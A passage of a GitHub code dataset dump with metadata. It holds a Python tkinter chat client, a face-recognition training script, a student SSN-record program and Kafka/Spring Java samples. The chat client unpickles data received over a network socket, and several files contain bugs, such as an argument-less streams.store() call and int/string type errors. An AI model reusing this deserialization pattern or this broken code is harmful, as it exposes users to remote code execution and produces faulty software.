text=\"Connect to others\", command = lambda: create_join_group_page(\"Enter name of group or user.\")).pack(side=\"right\")\n Button(buttons_frame, text=\"Log Out\", command = lambda: log_out()).pack(side=\"left\")\n buttons_frame.pack(fill=X)\n\n Label(frame, text=\"My contacts:\").pack()\n\n\n scrollbarFrame = Frame(frame)\n scrollbar = Scrollbar(scrollbarFrame)\n scrollbar.pack(side=\"right\", fill=Y)\n\n global groupsList\n groupsList = Listbox(scrollbarFrame, yscrollcommand = scrollbar.set)\n groupsList.bind(\"<<ListboxSelect>>\", click)\n\n for group in groups:\n groupsList.insert(END, group[0])\n\n groupsList.pack(fill=BOTH)\n scrollbar.config(command = groupsList.yview)\n\n scrollbarFrame.pack(fill=BOTH)\n frame.pack()\n\n\ndef create(username, password):\n\n if len(username) == 0 or len(password) == 0:\n create_login_page(\"One field [or more] is empty.\")\n else:\n global myName\n myName = username # you can put it at the beginning too, here is more efficient\n massageType = \"0\"\n send([massageType, username, password])\n\n\ndef login(username, password):\n\n global myName\n myName = username # all this in order for the window title to my name\n\n massageType = \"1\"\n send([massageType, username, password])\n\n\ndef create_login_page(msg):\n\n global frame, window\n window.title(\"\")\n try: frame.destroy()\n except: pass\n\n frame = Frame(window, height=300, width=400) # create new page\n frame.pack_propagate(0)\n frame.pack()\n\n Label(frame).pack()\n Label(frame, text=msg).pack()\n\n Label(frame, text=\"Username:\").pack()\n usernameEntry = Entry(frame)\n usernameEntry.pack()\n\n Label(frame, text=\"Password:\").pack()\n passwordEntry = Entry(frame)\n passwordEntry.pack()\n\n Button(frame, text=\"Create user\", command = lambda: create(usernameEntry.get(), passwordEntry.get())).pack()\n Button(frame, text=\"Log in\", command = lambda: login(usernameEntry.get(), passwordEntry.get())).pack()\n\n\ndef send(massage):\n\n massage = pickle.dumps(massage)\n clientSocket.send(massage)\n\n\ndef massage(words):\n\n global window, myName\n massageType = words[0]\n\n if massageType == \"0\": # login fail\n create_login_page(\"No such user. Try again.\")\n\n if massageType == \"1\": # server send groups list\n window.title(myName)\n create_groups_page(words[1])\n\n if massageType == \"2\": # server send massages in a group\n create_group_page(words[1], words[2], words[3])\n\n if massageType == \"3\": # the user you created already exist, or it is a name of a group\n create_login_page(\"Choose different username.\")\n\n if massageType == \"4\": # server send massages in a private group\n create_private_group_page(words[1], words[2])\n\n if massageType == \"5\": # you have just ..\n create_join_group_page(words[1])\n\n if massageType == \"6\": # new massage\n new_massage(words[1])\n\n if massageType == \"7\": # new massage\n new_member(words[1], words[2])\n\n if massageType == \"8\": # new massage\n create_login_page(\"Someone logged in to this account.\")\n\n\ndef listen():\n\n global clientSocket\n clientSocket = socket.socket(socket.SOCK_DGRAM)\n with open(\"connection_details.txt\") as fp:\n lines = fp.read().splitlines()\n serverIp = lines[0].split(\" \")[-1] # last word of first line\n port = lines[1].split(\" \")[-1] # last word of second line\n clientSocket.connect((serverIp,int(port)))\n\n serverIsFine = True\n windowIsOpen = True\n size = 512\n while serverIsFine and windowIsOpen: # while server is still working\n rlist, wlist, xlist = select.select([clientSocket], [clientSocket], [])\n if len(rlist) != 0:\n try:\n msg = b''\n while True:\n x = clientSocket.recv(size)\n msg = msg + x\n if len(x) < size:\n break\n words = pickle.loads(msg)\n massage(words)\n except:\n serverIsFine = False\n\n try:\n window.update()\n except:\n windowIsOpen = False\n\n break_length = 0.2\n time.sleep(break_length)\n\n\ndef main():\n\n global window, frame\n window = Tk()\n window.title(\"\")\n # window.geometry(\"300x240\")\n window.option_add(\"*Font\", (\"Times New Roman\",15))\n create_login_page(\"Welcome! Fill the form to get in.\")\n listen()\n\n\nif __name__ == '__main__':\n main()" } ]
2
abby711/Attendance-System-as-Face-Recognition-using-DL-ML-
https://github.com/abby711/Attendance-System-as-Face-Recognition-using-DL-ML-
710600bac855464e228b38889e5032b1895e1e4a
c1d8ad90d79c91c53b8e6f3dd8a830fb99d22dd6
661bd38394238b4bd8c513727e58037bd35e492c
refs/heads/main
2023-01-30T08:49:55.651942
2020-12-11T18:51:44
2020-12-11T18:51:44
320,643,171
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7462908029556274, "alphanum_fraction": 0.7492581605911255, "avg_line_length": 23.923076629638672, "blob_id": "73a7b36f604e82ede9d6462c25e900192b779216", "content_id": "b28d415519ffb589286598e0fea88918e7319b82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 674, "license_type": "no_license", "max_line_length": 50, "num_lines": 26, "path": "/day 17-attendance system(dl,ml)/trainingphase.py", "repo_name": "abby711/Attendance-System-as-Face-Recognition-using-DL-ML-", "src_encoding": "UTF-8", "text": "from sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.svm import SVC\r\nimport pickle\r\n\r\nembeddingfile='output/embeddings.pickle'\r\nrecognizerfile='output/recognizer.pickle'\r\nlabelencoderfile='output/le.pickle'\r\n\r\nprint(\"loading the embedded faces\")\r\ndata=pickle.loads(open(embeddingfile,\"rb\").read())\r\n\r\nprint(\"encoding labels\")\r\nlabelenc=LabelEncoder()\r\nlabels=labelenc.fit_transform(data[\"names\"])\r\n\r\nprint(\"Training Model\")\r\nrecog=SVC(C=1.0,kernel=\"linear\",probability=True)\r\nrecog.fit(data[\"embeddings\"],labels)\r\n\r\nf=open(recognizerfile,\"wb\")\r\nf.write(pickle.dumps(recog))\r\nf.close()\r\n\r\nf = open(labelencoderfile, \"wb\")\r\nf.write(pickle.dumps(labelenc))\r\nf.close()\r\n" }, { "alpha_fraction": 0.7924528121948242, "alphanum_fraction": 0.7924528121948242, "avg_line_length": 52, "blob_id": "2d70c063cb4a3e1896ec0a1d8dbae5fb6ca5f8c7", "content_id": "1a80961aa649afcbe27dc04b11820aa1915afd25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "no_license", "max_line_length": 52, "num_lines": 1, "path": "/README.md", "repo_name": "abby711/Attendance-System-as-Face-Recognition-using-DL-ML-", "src_encoding": "UTF-8", "text": "## Attendance System as Face Recognition using DL,ML\n" } ]
2
aarnessda/Lab2
https://github.com/aarnessda/Lab2
03e850162b373588a34d61d61faa7e4332639a6c
5518660109635bc7e3c6246d3ad1e72c5e9d361e
25aa86ace254fe5085abec6aa1e9bab49121fe74
refs/heads/master
2016-08-12T08:40:20.443346
2016-02-29T15:47:58
2016-02-29T15:47:58
52,800,640
0
0
null
2016-02-29T15:13:26
2016-02-29T15:13:26
2016-02-29T15:47:58
null
[ { "alpha_fraction": 0.707317054271698, "alphanum_fraction": 0.7317073345184326, "avg_line_length": 40, "blob_id": "9c10260ec9afe9d7b662639b94e3ff8f5f9aa1ac", "content_id": "adc5f29bc5e6253d10be5e09c8dea3b339d4d945", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "no_license", "max_line_length": 40, "num_lines": 1, "path": "/README.md", "repo_name": "aarnessda/Lab2", "src_encoding": "UTF-8", "text": "# repository for Lab 2 created by Daniel Aarness\n" }, { "alpha_fraction": 0.5970253944396973, "alphanum_fraction": 0.6064741611480713, "avg_line_length": 35.589744567871094, "blob_id": "d87e23fef2682381c8779a5e6a2d0c281fc68d1e", "content_id": "ea270ef0a46989aab351630b2ccf441e81c4235f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5715, "license_type": "no_license", "max_line_length": 126, "num_lines": 156, "path": "/Program2v1.py", "repo_name": "aarnessda/Lab2", "src_encoding": "UTF-8", "text": "\"\"\"\nDescription: This program will store an employee's SSN in a dictionary\nalong with their age, first name, and last name. This program also has\nthe capability to delete and change employees added to the dictionary.\n\"\"\"\n__author__=\"Daniel Aarness\"\n__date__=\"1/22/16\"\n\ndef checkSSN(tmpssn):\n \"\"\"\n Description: This function checks to see if a SSN is valid.\n Pre-Condition: tmpssn must be a string\n \"\"\"\n if len(tmpssn) == 11:\n if tmpssn[0:3].isdigit() and tmpssn[4:6].isdigit() and tmpssn[7:].isdigit() and tmpssn[3] == '-' and tmpssn[6] == '-':\n return True\n else:\n return False\n else:\n return False\n\ndef createMenu(tmpMenuList):\n \"\"\"\n Description: this function returns a menu\n Pre-Condition: tmpMenuList must have only 5 items\n \"\"\"\n ct = 0\n choicect = 1\n finalMenu = choicect+\")\"+tmpMenuList[ct]\n ct += 1\n choicect += 1\n while ct < len(tmpMenuList):\n for el in tmpMenuList:\n finalMenu += choicect+\")\"+tmpMenuList[ct]+\"\\n\"\n ct+=1\n choicect+=1\n return finalMenu\n\ndef deleteEmp(tmpSSN,empDict):\n \"\"\"\n Description: this function deletes an employee\n Pre-Condition: tmpsss is a string empDict is a dictionary\n \"\"\"\n if tmpSSN in empDict:\n del empDict[tmpSSN]\n return True\n else:\n return False\n\ndef addEmp(tmpSSN,tmpDict,tmpInfo):\n \"\"\"\n Description: this function adds an employee to the dictionary.\n Pre-Condition: tmpSSN is a string, tmpDict is a dictionary, tmpInfo is a list\n \"\"\"\n tmpDict[tmpSSN] = tmpInfo\n return True\n\ndef changeEmp(tmpDict,tmpSSN,tmpAge):\n \"\"\"\n Description: this function edits the age of an employee\n Pre-Condition: tmpDict is a dictionary, tmpSSN is a string, tmpAge is a string\n \"\"\"\n infoList = tmpDict[tmpSSN]\n infoList[-1] = tmpAge\n tmpDict[tmpSSN] = infoList\n\ndef printDict(tmpDict):\n \"\"\"\n Description: this function prints a dictionary\n Pre-Condition: tmpDict is a dictionary\n \"\"\"\n heading = \"{0:11s} {1:15s} {2:15s} {3:3s}\".format(\"SSN\",\"First Name\",\"Last Name\",\"Age\")\n print(heading)\n for k in tmpDict:\n ssn = k\n empList = tmpDict[k]\n fname = empList[0]\n lname = empList[1]\n age = empList[2]\n print(\"{0:11s} {1:15s} {2:15s} {3:3s}\".format(ssn,fname,lname,age))\n#main\n#initialize the dictionary\nempDict = {}\n#choose which 5 variables to put into the menu\nmenuList = [\"Add Employee\",\"Delete Employee\", \"Change Employee\", \"Print Roster\", \"Quit\"]\nmainMenu = createMenu(menuList)\n#print the menu\nprint(mainMenu)\n#ask user what they want to do\nuserInp = input(\"Please input a number: \")\nwhile userInp != 5:\n if userInp == 1:\n #ask the user to input an SSN\n empSSN = input(\"Please input the employee's SSN: \")\n if checkSSN(empSSN):\n #initialize the empInfo list\n empInfo = []\n #ask user for necessary info and put info into empInfo list \n fname = input(\"Please input the Employee's first name: \")\n empInfo.append(fname)\n lname = input(\"Please input the Employee's last name: \")\n empInfo.append(lname)\n empAge = input(\"Please input the Employee's age: \")\n empInfo.append(empAge)\n if addEmp(empSSN,empDict,empInfo):\n #after user has been added to dictionary return to main menu\n print(fname, \"has been succesfully added to the database.\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n else:\n #if SSN is invalid return to main menu\n print(\"ERROR -- invalid SSN -- Returning to main menu\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \") \n elif userInp == 2:\n #ask user for SSN of the employee they wish to delete\n empDel = input(\"Please input the SSN of the employee you wish to delete: \")\n if deleteEmp(empDel,empDict):\n #if SSN is in dictionary delete it and tell user it has been deleted\n print(\"Succesfully Deleted\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \") \n else:\n #if provided ssn is not in the dictionary return to main menu\n print(\"ERROR -- SSN not in database -- Returning to main menu\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n elif userInp == 3:\n #ask user which employee they want to edit\n empChange = input(\"Please input the SSN of the employee you wish to edit: \")\n if empChange in empDict:\n #ask user for updated age\n newAge = input(\"Please input the updated age of the employee: \")\n changeEmp(empDict,empChange,newAge)\n print(\"\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n else:\n #if ssn not in dictionary return to main menu\n print(\"ERROR -- SSN not in database -- Returning to main menu\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n elif userInp == 4:\n #call printDict function if user enters 4\n printDict(empDict)\n print(\"\\n\")\n #return to main menu after dictionary is printed\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n else:\n #ask user to try again if they do not enter a valid number\n print(\"ERROR -- Please input a valid choice\")\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n#thank user for using a program!!\nprint(\"Thanks for using this program\") \n" } ]
2
itsindranil/neel-kafka-course
https://github.com/itsindranil/neel-kafka-course
2e43b1152fd4319430c1bcddfd9aeb7946e947fa
e5c0ed7f720303619989fe44a9646a17362f5018
6a4a0c5a0466380e60b79e141580298ba3eeed35
refs/heads/master
2023-03-11T05:50:10.814076
2021-02-16T19:37:12
2021-02-16T19:37:12
299,875,299
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7130273580551147, "alphanum_fraction": 0.7209086418151855, "avg_line_length": 42.13999938964844, "blob_id": "0b4c92f8d9c6cdbc2e9bf2974948fa2c5bc099ef", "content_id": "8a15faedc3cfc28e3f9c90906fd3566190bc156a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2157, "license_type": "no_license", "max_line_length": 113, "num_lines": 50, "path": "/streams-1/src/main/java/com/neel/kafka/streams/StreamsApp1.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel.kafka.streams;\n\n\nimport org.apache.kafka.clients.consumer.ConsumerConfig;\nimport org.apache.kafka.common.serialization.Serdes;\nimport org.apache.kafka.streams.KafkaStreams;\nimport org.apache.kafka.streams.KeyValue;\nimport org.apache.kafka.streams.StreamsBuilder;\nimport org.apache.kafka.streams.StreamsConfig;\nimport org.apache.kafka.streams.kstream.*;\nimport org.apache.kafka.streams.state.QueryableStoreType;\nimport org.apache.kafka.streams.state.QueryableStoreTypes;\nimport org.apache.kafka.streams.state.ReadOnlyKeyValueStore;\n\nimport java.util.Properties;\n\npublic class StreamsApp1 {\n public static void main(String[] args) {\n Properties config = new Properties();\n config.setProperty(StreamsConfig.APPLICATION_ID_CONFIG, \"stream-app-1\");\n config.setProperty(StreamsConfig.BOOTSTRAP_SERVERS_CONFIG, \"neel-pc:9092\");\n config.setProperty(ConsumerConfig.AUTO_OFFSET_RESET_CONFIG, \"earliest\");\n config.setProperty(StreamsConfig.DEFAULT_KEY_SERDE_CLASS_CONFIG, Serdes.String().getClass().getName());\n config.setProperty(StreamsConfig.DEFAULT_VALUE_SERDE_CLASS_CONFIG, Serdes.String().getClass().getName());\n\n StreamsBuilder builder = new StreamsBuilder();\n\n KStream<String, String> stream1 = builder.stream(\"topic5\");\n // do stuff\n //kStream.to(\"topic-out-kstream\");\n // do stuff\n //table1.toStream().groupByKey().reduce((val1, val2) -> val2).toStream().to(\"topic-out-kstream\");\n KGroupedStream<String, String> grpstream1 = stream1.groupByKey();\n\n KTable<String, Long> outstream = grpstream1.count(Materialized.as(\"cnt\"));\n\n KafkaStreams streams = new KafkaStreams(builder.build(), config);\n streams.start();\n\n ReadOnlyKeyValueStore<String, Long> keyValueStore = streams.store();\n\n System.out.println(\"Count for 1 is \"+ keyValueStore.get(\"1\"));\n // print the topology\n //streams.localThreadsMetadata().forEach(data -> System.out.println(data));\n\n // shutdown hook to correctly close the streams application\n Runtime.getRuntime().addShutdownHook(new Thread(streams::close));\n\n }\n}\n" }, { "alpha_fraction": 0.7727272510528564, "alphanum_fraction": 0.7727272510528564, "avg_line_length": 16.600000381469727, "blob_id": "6a2e1cc628a804d4b0ac377f3504aa2f847c7b63", "content_id": "643e159d88afa81517d88e34220217614b46be82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 176, "license_type": "no_license", "max_line_length": 62, "num_lines": 10, "path": "/App2/src/main/java/com/neel/AssistantCoachService.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel;\n\npublic class AssistantCoachService implements AssistantCoach {\n\n\t@Override\n\tpublic String additionalWorkout() {\n\t\treturn \"Proceed to fitness regimen\";\n\t}\n\n}\n" }, { "alpha_fraction": 0.6966745257377625, "alphanum_fraction": 0.6983540654182434, "avg_line_length": 44.10606002807617, "blob_id": "b8e7136a158f09dcb9c572f4944adebce73cf3ee", "content_id": "23cdebbf7010d153cebb5d3fe6e166eb7948dd00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2977, "license_type": "no_license", "max_line_length": 134, "num_lines": 66, "path": "/neel-kafka-course/src/main/java/com/neel/kafkacourse/QueryStoreClass.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel.kafkacourse;\n\nimport com.neel.kafkacourse.serde.AppSerdes;\nimport org.apache.kafka.streams.KafkaStreams;\nimport org.apache.kafka.streams.StreamsBuilder;\nimport org.apache.kafka.streams.StreamsConfig;\nimport org.apache.kafka.streams.Topology;\nimport org.apache.kafka.streams.kstream.Consumed;\nimport org.apache.kafka.streams.kstream.KStream;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport java.util.Properties;\nimport java.util.concurrent.TimeUnit;\n\npublic class QueryStoreClass {\n static Logger logger = LoggerFactory.getLogger(QueryStoreClass.class);\n\n public static void main(String[] args) throws InterruptedException {\n Properties properties = new Properties();\n properties.setProperty(StreamsConfig.APPLICATION_ID_CONFIG, \"streams-app\");\n properties.setProperty(StreamsConfig.BOOTSTRAP_SERVERS_CONFIG, AppConfigs.bootstrapServers);\n properties.setProperty(StreamsConfig.STATE_DIR_CONFIG, AppConfigs.stateStoreLocation);\n properties.setProperty(StreamsConfig.APPLICATION_SERVER_CONFIG, AppConfigs.queryServerHost+ \":\" + AppConfigs.queryServerPort);\n //properties.setProperty(StreamsConfig.DEFAULT_KEY_SERDE_CLASS_CONFIG, AppSerdes.String().getClass().getName());\n //properties.setProperty(StreamsConfig.DEFAULT_VALUE_SERDE_CLASS_CONFIG, AppSerdes.Employees().getClass().getName());\n\n StreamsBuilder builder = new StreamsBuilder();\n //Creating the Stream\n KStream<String, String> KS_AdClick = builder.stream(\"sample-topic\", Consumed.with(AppSerdes.String(), AppSerdes.String()));\n\n // KT_AdInv.toStream().foreach((k, v) -> System.out.println(\"Key: \" + k + \" Value: \" + v));\n Topology topology = builder.build();\n\n KafkaStreams streams = new KafkaStreams(topology, properties);\n logger.info(\"Starting Streams\");\n\n\n QueryServer queryServer = new QueryServer(streams, AppConfigs.queryServerHost, AppConfigs.queryServerPort);\n streams.setStateListener((newState, oldState) -> {\n logger.info(\"State Changing to \" + newState + \" from \" + oldState);\n queryServer.setActive(newState == KafkaStreams.State.RUNNING && oldState == KafkaStreams.State.REBALANCING);\n });\n\n\n streams.start();\n TimeUnit.SECONDS.sleep(10);\n queryServer.start();\n/*\n //Get the key value store\n ReadOnlyKeyValueStore<String, Regions> kvStore = streams.store(\"store-test_kt_join3\", QueryableStoreTypes.keyValueStore());\n\n //Get all values for all keys\n KeyValueIterator<String, Regions> range = kvStore.all();\n while (range.hasNext()) {\n KeyValue<String, Regions> next = range.next();\n logger.info(\"Key: \" + next.key + \" value: \" + next.value);\n }\n*/\n Runtime.getRuntime().addShutdownHook(new Thread(() -> {\n logger.info(\"Shutting Down streams\");\n queryServer.stop();\n streams.close();\n }));\n }\n}\n" }, { "alpha_fraction": 0.7414860725402832, "alphanum_fraction": 0.7430340647697449, "avg_line_length": 25.91666603088379, "blob_id": "5a516bc22629779acbffccaa590eca72dbf908be", "content_id": "1d09e066a6b16541da83b656f9a44515f5431d10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 646, "license_type": "no_license", "max_line_length": 105, "num_lines": 24, "path": "/App2/src/main/java/com/neel/SpringApp3.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel;\n\nimport org.springframework.context.support.ClassPathXmlApplicationContext;\n\npublic class SpringApp3 {\n\n\tpublic static void main(String[] args) {\n\t\t\t//load the application context file\n\t\t\tClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext(\"applicationContext.xml\");\n\t\t\t\n\t\t\t//get the bean\n\t\t\tBaseballCoach theCoach = context.getBean(\"myBaseballCoach\", BaseballCoach.class);\n\t\t\t//call the method\n\t\t\tSystem.out.println(theCoach.getDailyWorkout());\n\t\t\t\n\t\t\tSystem.out.println(theCoach.getEmail_address());\n\t\t\t\n\t\t\tSystem.out.println(theCoach.getTeam());\n\t\t\t\n\t\t\t//close the context\n\t\t\tcontext.close();\n\t\t}\n\n\t}\n" }, { "alpha_fraction": 0.5615299344062805, "alphanum_fraction": 0.5762194991111755, "avg_line_length": 32.11009216308594, "blob_id": "1acbce18c77c38e95f7dd8aaa3b3141a2bd1f5a3", "content_id": "4a83817ce9ff74dda1896a5059ed7108f9e95354", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Maven POM", "length_bytes": 3608, "license_type": "no_license", "max_line_length": 205, "num_lines": 109, "path": "/neel-kafka-course/pom.xml", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "<project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd\">\n <modelVersion>4.0.0</modelVersion>\n <groupId>com.neel.kafkacourse</groupId>\n <artifactId>neel-kafka-course</artifactId>\n <version>1.0</version>\n\n <properties>\n <java.vsersion>1.8</java.vsersion>\n <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>\n\n </properties>\n <build>\n <plugins>\n <plugin>\n <groupId>org.apache.maven.plugins</groupId>\n <artifactId>maven-compiler-plugin</artifactId>\n <version>3.8.1</version>\n <configuration>\n <source>${java.version}</source>\n <target>${java.version}</target>\n </configuration>\n </plugin>\n\n <!-- Json Schema to POJO plugin-->\n <plugin>\n <groupId>org.jsonschema2pojo</groupId>\n <artifactId>jsonschema2pojo-maven-plugin</artifactId>\n <version>0.5.1</version>\n <executions>\n <execution>\n <goals>\n <goal>generate</goal>\n </goals>\n <configuration>\n <sourceDirectory>${project.basedir}/src/main/resources/schema/</sourceDirectory>\n <outputDirectory>${project.basedir}/src/main/java/</outputDirectory>\n <includeAdditionalProperties>false</includeAdditionalProperties>\n <includeHashcodeAndEquals>false</includeHashcodeAndEquals>\n <generateBuilders>true</generateBuilders>\n </configuration>\n </execution>\n </executions>\n </plugin>\n\n\n </plugins>\n </build>\n <name>neel-kafka-course</name>\n <description>Kafka beginners course</description>\n \n <repositories>\n\n\n\n <!-- further repository entries here -->\n\n</repositories>\n \n<dependencies>\n <!--Apache commons-->\n <dependency>\n <groupId>commons-lang</groupId>\n <artifactId>commons-lang</artifactId>\n <version>2.6</version>\n </dependency>\n\n <!-- https://mvnrepository.com/artifact/org.apache.kafka/kafka-clients -->\n\t<dependency>\n \t<groupId>org.apache.kafka</groupId>\n \t<artifactId>kafka-clients</artifactId>\n \t<version>2.6.0</version>\n\t</dependency>\n\n <dependency>\n <groupId>org.apache.kafka</groupId>\n <artifactId>kafka-streams</artifactId>\n <version>2.6.0</version>\n </dependency>\n\n <!-- further dependency entries here -->\n <!-- https://mvnrepository.com/artifact/org.slf4j/slf4j-simple -->\n\t<dependency>\n \t<groupId>org.slf4j</groupId>\n \t<artifactId>slf4j-simple</artifactId>\n \t<version>1.7.30</version>\n\t</dependency>\n\n <!--spark java framework for embedded -->\n <dependency>\n <groupId>com.sparkjava</groupId>\n <artifactId>spark-core</artifactId>\n <version>2.5</version>\n </dependency>\n <!-- javax.ws.rs -->\n <dependency>\n <groupId>javax.ws.rs</groupId>\n <artifactId>javax.ws.rs-api</artifactId>\n <version>2.1</version>\n </dependency>\n <!--Jeersey dependencies -->\n <dependency>\n <groupId>org.glassfish.jersey.containers</groupId>\n <artifactId>jersey-container-servlet</artifactId>\n <version>2.27</version>\n </dependency>\n\n</dependencies>\n \n</project>" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 17.5, "blob_id": "60d67b5a36d5d6ad64befc2c5ce0814c4cb63a5c", "content_id": "d1d205613cc9aa0f313e067f34bbb2428b424bb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 36, "license_type": "no_license", "max_line_length": 22, "num_lines": 2, "path": "/App2/src/main/java/sport.properties", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "email=newemail@neel_sport.com\nteam=NeelBaseball_Team" }, { "alpha_fraction": 0.7638888955116272, "alphanum_fraction": 0.765625, "avg_line_length": 25.18181800842285, "blob_id": "726d939234940c9e6f09f3ae3ee5d3e3b765f5ce", "content_id": "26d055ed6a1d90a8766b4dffcd93761d7f85f3e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 576, "license_type": "no_license", "max_line_length": 104, "num_lines": 22, "path": "/App2/src/main/java/com/neel/SpringApp2.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel;\n\nimport org.springframework.context.support.ClassPathXmlApplicationContext;\n\npublic class SpringApp2 {\n\n\tpublic static void main(String[] args) {\n\t\t//load the application context file\n\t\tClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext(\"applicationContext.xml\");\n\t\t\n\t\t//get the bean\n\t\tCoach theCoach = context.getBean(\"myBaseballCoach\", Coach.class);\n\t\t//call the method\n\t\tSystem.out.println(theCoach.getDailyWorkout());\n\t\t\n\t\tSystem.out.println(theCoach.getAssistantCoachAdvise());\n\t\t\n\t\t//close the context\n\t\tcontext.close();\n\t}\n\n}\n" }, { "alpha_fraction": 0.6071428656578064, "alphanum_fraction": 0.6785714030265808, "avg_line_length": 11.142857551574707, "blob_id": "ad75cf2a0f303de264c3da76a52bc6e1b882fa86", "content_id": "3ce15036806fb71f6c2ddde19d5acaf9d5978706", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 37, "num_lines": 7, "path": "/TestPython/src/hello.py", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "'''\nCreated on 09-Aug-2020\n\n@author: neel\n'''\n\nprint(\"Hello Neel from Eclipse test\")" }, { "alpha_fraction": 0.8121739029884338, "alphanum_fraction": 0.8121739029884338, "avg_line_length": 29.263158798217773, "blob_id": "d79a683c1601e833e74d0cff6419db403e8a0ec8", "content_id": "beba8d38e09e4412911525c80af2cd1a8cc2bd25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 575, "license_type": "no_license", "max_line_length": 63, "num_lines": 19, "path": "/firstApp/src/main/java/com/neel/springboot/WelcomeController.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel.springboot;\n\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.web.bind.annotation.RequestMapping;\nimport org.springframework.web.bind.annotation.RestController;\nimport com.neel.service.WelcomeServiceClass;\n\n@RestController\npublic class WelcomeController {\n\t//We inject the dependency created below by Auto Wiring\n\t@Autowired\n\t//private welcomeServiceClass msg = new welcomeServiceClass();\n\tprivate WelcomeServiceClass msg;\n\t\n\t@RequestMapping(\"/welcome\")\n\tpublic String welcome() {\n\t\treturn msg.WelcomeMessage();\n\t}\n}\n" }, { "alpha_fraction": 0.6477757692337036, "alphanum_fraction": 0.6477757692337036, "avg_line_length": 21.46575355529785, "blob_id": "a59d76a89091a70cc4ee6c0e9d050fe5c7d8e4a6", "content_id": "998969ae675cd7258bf238b88deaa7b777bd12b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1641, "license_type": "no_license", "max_line_length": 125, "num_lines": 73, "path": "/neel-kafka-course/src/main/java/com/neel/kafkacourse/types/Customers.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "\npackage com.neel.kafkacourse.types;\n\nimport com.fasterxml.jackson.annotation.JsonInclude;\nimport com.fasterxml.jackson.annotation.JsonProperty;\nimport com.fasterxml.jackson.annotation.JsonPropertyOrder;\nimport org.apache.commons.lang.builder.ToStringBuilder;\n\n@JsonInclude(JsonInclude.Include.NON_NULL)\n@JsonPropertyOrder({\n \"custID\",\n \"name\",\n \"address\"\n})\npublic class Customers {\n\n @JsonProperty(\"custID\")\n private String custID;\n @JsonProperty(\"name\")\n private String name;\n @JsonProperty(\"address\")\n private String address;\n\n @JsonProperty(\"custID\")\n public String getCustID() {\n return custID;\n }\n\n @JsonProperty(\"custID\")\n public void setCustID(String custID) {\n this.custID = custID;\n }\n\n public Customers withCustID(String custID) {\n this.custID = custID;\n return this;\n }\n\n @JsonProperty(\"name\")\n public String getName() {\n return name;\n }\n\n @JsonProperty(\"name\")\n public void setName(String name) {\n this.name = name;\n }\n\n public Customers withName(String name) {\n this.name = name;\n return this;\n }\n\n @JsonProperty(\"address\")\n public String getAddress() {\n return address;\n }\n\n @JsonProperty(\"address\")\n public void setAddress(String address) {\n this.address = address;\n }\n\n public Customers withAddress(String address) {\n this.address = address;\n return this;\n }\n\n @Override\n public String toString() {\n return new ToStringBuilder(this).append(\"custID\", custID).append(\"name\", name).append(\"address\", address).toString();\n }\n\n}\n" }, { "alpha_fraction": 0.6453320384025574, "alphanum_fraction": 0.6453320384025574, "avg_line_length": 21.824174880981445, "blob_id": "df77ac170d7e4bd6755504398cb5c9d2a71dc4ba", "content_id": "9ccf397525cbb62a9db8c52edc82845f98dee2d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2078, "license_type": "no_license", "max_line_length": 154, "num_lines": 91, "path": "/neel-kafka-course/src/main/java/com/neel/kafkacourse/types/Employees.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "\npackage 